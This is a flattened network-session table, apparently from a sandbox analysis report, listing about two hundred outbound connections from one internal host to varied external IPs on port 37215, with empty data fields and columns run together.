                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16410192.168.2.1341982157.182.53.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16411192.168.2.1358074137.181.89.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16412192.168.2.1354470157.116.9.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16413192.168.2.1354500157.111.105.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16414192.168.2.1357824157.207.39.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16415192.168.2.1343836118.61.20.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16416192.168.2.1342426157.74.8.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16417192.168.2.1341670197.136.229.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16418192.168.2.134065641.162.129.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16419192.168.2.1348230197.62.113.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16420192.168.2.1339570157.9.99.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16421192.168.2.1337470197.129.8.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16422192.168.2.1337016157.106.155.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16423192.168.2.1334002197.41.56.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16424192.168.2.1337202179.61.255.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16425192.168.2.1356120197.165.246.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16426192.168.2.1357142157.6.127.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16427192.168.2.133392864.156.82.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16428192.168.2.1349654197.219.222.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16429192.168.2.135303441.13.247.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16430192.168.2.1356492157.81.134.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16431192.168.2.133280241.170.62.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16432192.168.2.135030241.180.178.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16433192.168.2.1355488197.82.10.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16434192.168.2.1359090157.16.103.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16435192.168.2.1339506197.64.197.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16436192.168.2.1348882176.232.78.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16437192.168.2.1351360191.234.209.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16438192.168.2.1344106197.150.29.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16439192.168.2.1346714197.134.199.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16440192.168.2.1353614197.197.50.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16441192.168.2.1360530197.41.133.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16442192.168.2.1339236157.57.124.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16443192.168.2.1346842140.166.53.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16444192.168.2.1347668197.191.155.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16445192.168.2.1344766157.159.123.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16446192.168.2.1341038197.41.97.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16447192.168.2.133991841.126.132.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16448192.168.2.133492241.75.83.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16449192.168.2.1345878197.97.61.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16450192.168.2.133739441.228.30.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16451192.168.2.133546041.25.84.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16452192.168.2.134191259.123.171.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16453192.168.2.134439641.241.52.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16454192.168.2.135495292.94.60.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16455192.168.2.1333232197.58.241.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16456192.168.2.133937641.225.222.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16457192.168.2.1334572137.215.221.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16458192.168.2.1352066197.184.86.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16459192.168.2.1337452197.221.168.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16460192.168.2.1342712157.41.245.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16461192.168.2.1359718157.235.56.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16462192.168.2.135907041.161.70.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16463192.168.2.1351732157.187.237.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16464192.168.2.1333084157.80.44.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16465192.168.2.1357422178.66.152.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16466192.168.2.1345564197.22.151.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16467192.168.2.135969870.31.58.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16468192.168.2.133801469.82.220.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16469192.168.2.1344694157.136.14.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16470192.168.2.1350212157.38.146.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16471192.168.2.1350702157.182.135.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16472192.168.2.135809835.66.213.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16473192.168.2.1348512197.18.173.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16474192.168.2.1334904197.28.235.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16475192.168.2.1355874121.21.248.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16476192.168.2.135160241.68.226.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16477192.168.2.135956441.37.28.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16478192.168.2.1349784197.46.184.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16479192.168.2.1344208197.162.92.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16480192.168.2.1339546197.241.17.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16481192.168.2.1342552102.48.92.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16482192.168.2.133542241.143.0.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16483192.168.2.1359572197.215.16.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16484192.168.2.1353754157.25.181.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16485192.168.2.1342300197.70.98.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16486192.168.2.1349140184.198.3.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16487192.168.2.1339294197.116.144.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16488192.168.2.133342441.208.208.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16489192.168.2.134208641.230.198.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16490192.168.2.1334998165.53.11.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16491192.168.2.135792471.76.2.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16492192.168.2.1360482197.253.135.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16493192.168.2.1341866105.202.113.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16494192.168.2.134797423.75.42.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16495192.168.2.134007686.59.9.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16496192.168.2.1358780197.193.187.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16497192.168.2.1355824157.240.170.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16498192.168.2.135406841.237.220.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16499192.168.2.1346062157.165.202.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16500192.168.2.1334658160.227.123.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16501192.168.2.134029841.64.214.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16502192.168.2.1355882157.99.94.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16503192.168.2.1340446197.90.48.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16504192.168.2.135967441.108.99.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16505192.168.2.1360640197.56.39.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16506192.168.2.1336384202.130.87.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16507192.168.2.1346008197.2.122.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16508192.168.2.1347366157.68.240.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16509192.168.2.133637641.222.181.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16510192.168.2.133982041.58.146.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16511192.168.2.1344076163.133.131.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16512192.168.2.1335002197.90.35.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16513192.168.2.133716448.116.127.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16514192.168.2.1359966197.230.67.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16515192.168.2.1343886197.247.135.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16516192.168.2.135682841.135.127.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16517192.168.2.133640441.219.240.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16518192.168.2.134195841.54.222.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16519192.168.2.1338080157.154.83.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16520192.168.2.1347028190.190.167.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16521192.168.2.1342754157.113.115.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16522192.168.2.133551441.219.237.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16523192.168.2.135053641.57.228.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16524192.168.2.1355306197.109.235.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16525192.168.2.1354824157.128.222.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16526192.168.2.135672041.226.232.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16527192.168.2.135637618.249.42.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16528192.168.2.1339476157.30.180.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16529192.168.2.1340304197.95.91.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16530192.168.2.135860241.90.145.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16531192.168.2.1347326157.66.114.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16532192.168.2.1344178197.103.106.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16533192.168.2.1355408197.55.52.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16534192.168.2.1348470197.78.210.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16535192.168.2.1341354135.22.5.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16536192.168.2.1340472157.67.146.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16537192.168.2.1342844197.164.38.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16538192.168.2.1342620157.234.139.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16539192.168.2.1354480144.15.163.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16540192.168.2.134287877.143.238.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16541192.168.2.1351194157.238.227.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16542192.168.2.133652441.144.35.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16543192.168.2.1345552197.48.131.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16544192.168.2.1339846157.169.1.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16545192.168.2.134665641.161.174.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16546192.168.2.1345042170.26.166.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16547192.168.2.1335608176.131.62.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16548192.168.2.1343462197.73.152.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16549192.168.2.1349084103.2.158.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16550192.168.2.1333042197.201.10.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16551192.168.2.133842841.226.188.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16552192.168.2.1347484197.253.155.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16553192.168.2.135685036.195.100.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16554192.168.2.1337672119.246.178.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16555192.168.2.1338344157.166.98.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16556192.168.2.1355062157.237.141.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16557192.168.2.1346604203.94.66.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16558192.168.2.135707814.150.231.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16559192.168.2.1347154197.232.33.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16560192.168.2.133532241.62.115.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16561192.168.2.134782489.51.107.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16562192.168.2.1348664197.110.151.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16563192.168.2.1341026197.34.231.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16564192.168.2.1343794197.121.134.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16565192.168.2.1341434118.117.25.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16566192.168.2.1356564112.152.251.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16567192.168.2.1349826119.75.185.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16568192.168.2.1340690103.198.192.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16569192.168.2.1341400157.228.177.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16570192.168.2.1342454197.47.173.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16571192.168.2.1356836200.143.4.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16572192.168.2.1344124126.24.168.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16573192.168.2.1347540157.186.31.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16574192.168.2.1356290157.57.10.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16575192.168.2.1343766157.76.239.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16576192.168.2.1348366197.246.51.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16577192.168.2.1354092197.73.47.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16578192.168.2.133815690.35.252.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16579192.168.2.135136475.183.204.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16580192.168.2.134307041.93.64.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16581192.168.2.1347694157.50.229.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16582192.168.2.1360906142.227.232.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16583192.168.2.1343908157.210.42.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16584192.168.2.1334822157.218.66.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16585192.168.2.133885041.77.16.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16586192.168.2.1350900149.236.32.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16587192.168.2.1345306197.238.168.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16588192.168.2.135886881.130.173.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16589192.168.2.1347586172.15.114.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16590192.168.2.134904441.180.141.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16591192.168.2.1336898157.26.252.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16592192.168.2.134663841.186.129.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16593192.168.2.1360530157.81.214.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16594192.168.2.135471042.179.237.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16595192.168.2.134292841.163.229.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16596192.168.2.1352406157.112.171.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16597192.168.2.1352892157.85.212.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16598192.168.2.1342770157.237.68.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16599192.168.2.135526645.179.194.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16600192.168.2.133320280.155.224.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16601192.168.2.134700665.59.137.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16602192.168.2.1356134157.31.231.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16603192.168.2.135453441.213.173.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16604192.168.2.1356718157.224.85.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16605192.168.2.1334544197.155.66.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16606192.168.2.1340268197.149.131.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16607192.168.2.135871641.216.62.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16608192.168.2.135670241.143.212.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16609192.168.2.135736441.218.159.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16610192.168.2.1358734157.185.120.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16611192.168.2.1333672183.127.172.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16612192.168.2.1354304143.55.158.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16613192.168.2.1349622195.3.126.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16614192.168.2.1333722197.71.148.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16615192.168.2.135593641.105.42.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16616192.168.2.1355312157.171.225.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16617192.168.2.1360818211.8.140.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16618192.168.2.135783641.50.181.2837215
                                                  TimestampBytes transferredDirectionData


